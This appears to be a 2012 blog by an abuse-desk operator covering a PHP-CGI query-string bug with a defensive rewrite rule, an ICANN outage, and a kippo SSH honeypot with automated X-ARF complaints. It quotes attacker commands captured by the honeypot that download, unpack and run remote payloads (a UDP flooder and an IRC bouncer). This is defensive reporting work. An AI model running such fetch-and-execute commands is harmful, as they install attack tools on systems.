spamversand

If you run PHP in cgi-mode you are probably vulnerable to a newly found bug:
Heise: Gefahr-durch-offene-PHP-Luecke
Adding parameters like http://localhost/index.php?-s to an url can show the source code or even inject or run parametes in the shell.

Until an update exists it might be wise to filter out some string-elements (like “-” without “=”)
RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
RewriteRule ^(.*) $1? [L]


Just a few hours before the deadline in submitting new applications passes the online portal
TAS for submitting these broke down..

ICANN registration info

12 April 2012: Application window closes at 23:59 UTC on 12 April 2012

The database behind is obviously not stress-tested or poorly designed.
Funny that ICANN demands detailed technical expertise for applicants but fails
when data is really submitted.

cite from ICANN-page::
ICANN constantly monitors the performance of the TLD Application System (TAS). Recently, we received a report of unusual behavior with the operation of the TAS system. We then identified a technical issue with the TAS system software.

We apologize for any inconvenience this has caused. If you have any questions, please contact the gTLD Customer Service Center (CSC) via the CSC portal.


One recent reply to a kippo-attack complaint explained that the attacking ip is a TOR exit node.

Of course there is no way for us to find the real attacker when he/she is using TOR

for making this attack. Sad that this important service is abused in this way.

The system you have identified (cs-tor.bu.edu / 204.8.156.142) is an exit node on the Tor network. Tor is a distributed cryptographic anonymizing proxy service. The network traffic you detected was merely relayed through this system, and did not originate there. It is not possible to trace these connections back to their original source.

The automatic complaint-mechanism is now active. A X-ARF complaint is generated
for each session where a successful login into the kippo-honeypot produced some
recorded commands. The email address where the complaint is sent to is generated
like always – check own database, check ripe-website and check abusix.
Here is an example of the second mime-part:

MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="utf8"; name="report.yaml"

—
Reported-From: spamtrap@netcologne.de
Category: abuse
Report-Type: login-attack
Destination-System: kippo – sshd honeypot
User-Agent: PHREAK 1.3
Report-ID: 2faf4f486d7f11e18949797f346be17f@netcologne.de
Date: 2012-03-14 03:45:28
Service: sshd
Port: 22
Source: 89.129.**.** (obfuscated)
Source-Type: ipv4
Attachment: text/plain
Schema-URL: http://www.x-arf.org/schema/abuse_login-attack_0.1.2.json
Version: 1.0.1

and the third MIME-part looks like this:


MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="utf8"; name="command.txt"

recorded commands during this session:

w
uname -a
wget http://root-arhive.at.ua/flood/udp.tgz
tar zxvf udp.tgz
rm -rf udp.tgz
chmod +x *
–===============0648269240==–

I am pretty close to start sending out complaints
for successful sshd – logins on my kippo honeypot.
The X-ARF part is ready. I decided to add the recorded
commands in the 3rd MIME-part. The ttylog could also
be useful, but the receiver of the complaint is probably
not so interested in starting the playlog utility for
each complaint.
I still need to implement a database check so that receivers
only get a handful complaints and are not overwhelmed by the
number of complaints..
Additionally the catched ips will be added in our blacklist,
just like in the attacks cachted by nepenthes.
Dionaea-attacks will come next

Today I received a notification from projecthoneypot.org
that one of my donated spamtrap-domains helped to catch a new
harvester. Feels good to be able to help

After trying to build some nice graphs for the kippo-honeypot with PyCha I found

this little toolbox making things way better than I did:

kippo-graph Homepage (link fixed)

Here are the first results from my honeypot: (no live db-queries made, so Inputs
are not visible right now) Kippo-Stats

The kippo honeypot is now running for about a week..

Up to now I have seen

* more than 1.3 Million Connects

* more than 7.100 successful logins

* > 2.200 commands typed

* more than 2.100 different Source IP addresses

* 178 Files uploaded, most of them psyBNC bouncers

Whow.. I expected *some* brute-force atempts, but that much?

The sshd – honeypot named kippo is a fun tool to play with. After installing it I found
more than 1000 successful logins in about 12 hours! Most logins do nothing
after having success, but some are downloading files and try to do “things”:

-rw——- 1 kippo kippo 81211778 Dec 6 23:20 20111206231910_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw——- 1 kippo kippo 34603008 Dec 7 01:19 20111207011938_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw——- 1 kippo kippo 53477376 Dec 7 01:21 20111207012055_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw——- 1 kippo kippo 3513408 Dec 7 01:21 20111207012120_http___www_steampowered_com_download_hldsupdatetool_bin
-rw——- 1 kippo kippo 608074 Dec 7 08:46 20111207084559_http___4u_moy_su_bnc_jpg

coming from commands like:

CMD: wget http://4u.moy.su/bnc.jpg;tar zxvf bnc.jpg;rm -rf bnc.jpg;cd .log;./go

I will try to build some public stats later..

A twitter-message:

“Under SOPA, you could get 5 years for uploading a Michael Jackson
song, one year more than the doctor who killed him.”

For those who don’t know, what SOPA means:

http://en.wikipedia.org/wiki/Stop_Online_Piracy_Act